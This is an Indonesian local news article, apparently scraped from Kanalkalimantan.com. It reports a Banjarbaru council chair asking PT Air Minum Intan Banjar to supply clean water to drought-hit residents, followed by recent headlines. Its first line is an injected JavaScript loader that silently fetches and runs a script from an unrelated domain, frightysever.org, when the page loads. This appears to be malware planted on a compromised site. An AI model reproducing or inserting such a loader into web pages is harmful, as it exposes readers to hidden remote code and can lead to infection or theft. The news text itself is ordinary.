(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD BANJARBARU

Fadliansyah Minta Pasokan Air Bersih ke Warga yang Alami Kekeringan


KANALKALIMANTAN.COM, BANJARBARU – Ketua DPRD Banjarbaru Fadliansyah meminta PT Air Minum Intan Banjar membantu warga yang mengalami kesulitan air bersih akibat kekeringan musim kemarau.

“Kami minta PT AM Intan Banjar membantu masyarakat yang tengah kesulitan mendapatkan air bersih, sehingga bisa memakai air untuk kebutuhan sehari-hari,” ujarnya, Kamis (7/9/2023).

Menurut Fadliansyah, wakil rakyat cukup banyak menerima informasi dan keluhan warga yang kesulitan air bersih akibat kemarau sejak dua bulan terakhir yang membuat sumur kering tanpa air.

Fadliansyah menyarankan, PT AM Intan Banjar berkoordinasi dengan BPBD Banjarbaru untuk bisa membantu kebutuhan air bersih bagi warga yang kekurangan.

“Masyarakat harus dibantu, apalagi air adalah kebutuhan dasar setiap manusia sehingga harus dipenuhi untuk kebutuhan sehari-hari yang tidak pernah lepas dari keberadaan air bersih,” ungkapnya.

Permintaan agar PT AM Intan Banjar membantu air bersih warga Banjarbaru karena kantor perusahaan berada di Kota Banjarbaru dan jumlah pelanggan yang mencapai puluhan ribu.

“Jadi wajar PT AM Intan Banjar memberi bantuan air bersih karena berkantor di Banjarbaru dan sebagai besar pelanggan berada di wilayah Banjarbaru dan mereka sangat kesulitan air,” tuturnya.

PT AM Intan Banjar memperbesar diameter pipa sehingga distribusi air bersih dapat terbagi merata, terlebih saat warga kesulitan air sebagai dampak kekeringan seperti saat ini.

“Jika kondisinya memungkinkan maka jaringan pipanisasi diameter kecil, diperbesar supaya suplai air bersih terbagi merata ke masyarakat, khususnya wilayah Banjarbaru dan kabupaten Banjar,” katanya.

Direktur Umum PT AM Intan Banjar Abdullah Saraji menyatakan kesiapan membantu air bersih bagi warga yang kesulitan air dan sudah berkoordinasi dengan BPBD.

“Kami sudah menerima surat dari BPBD berisi permintaan air bersih yang didistribusikan kepada warga. Silakan mengambil air bersih di IPA I Bundaran STM Banjarbaru sesuai kebutuhan,” katanya.

Masyarakat Banjarbaru khusus yang mengandalkan sumur, mengalami kesulitan air bersih karena sumur kering tanpa air akibat musim kemarau yang melanda sejak dua bulan terakhir. (Kanalkalimantan.com/bie)

Reporter : bie
Editor : kk


Muhammad Andi

Recent Posts

Pj Bupati Kapuas Erlin Hardi ke Desa Tumbang Mangkutup

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi bersilaturahmi dengan masyarakat Desa Tumbang… Read More

8 jam ago

Satgas TMMD Beri Penyuluhan Pertanian dan Perikanan di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Setelah program non fisik sosialisasi PHBS (Perilaku Hidup bersih Sehat) dan masalah… Read More

8 jam ago

Banjarbaru Posisi Kedua Klasemen Sementara Popda Kalsel 2024

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah cabang olahraga (cabor) unggulan membawa kontingen Kota Banjarbaru bertengger di posisi… Read More

11 jam ago

Hasnur Resmi Lamar Partai Golkar, Mencari ‘Pintu’ Koalisi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hasnuryadi Sulaiman untuk maju pada kontestasi Pemilihan Gubernur dan Wakil Gubernur… Read More

12 jam ago

Pasti Maju Pilwali Banjarbaru, Ovie Simpan Nama Pasangan

KANALKALIMANTAN.COM, BANJARBARU - Aditya Mufti Ariffin memastikan akan kembali berkontestasi dalam Pemilihan Kepala Daerah (Pilkada)… Read More

13 jam ago

Soal Caleg Terpilih Mundur atau Tidak Mundur Jika Maju Pilkada, Begini Penjelasan KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Anggota Komisi Pemilihan Umum (KPU) Provinsi Kalimantan Selatan (Kalsel), Fahmi Failasopa menegaskan… Read More

16 jam ago

This website uses cookies.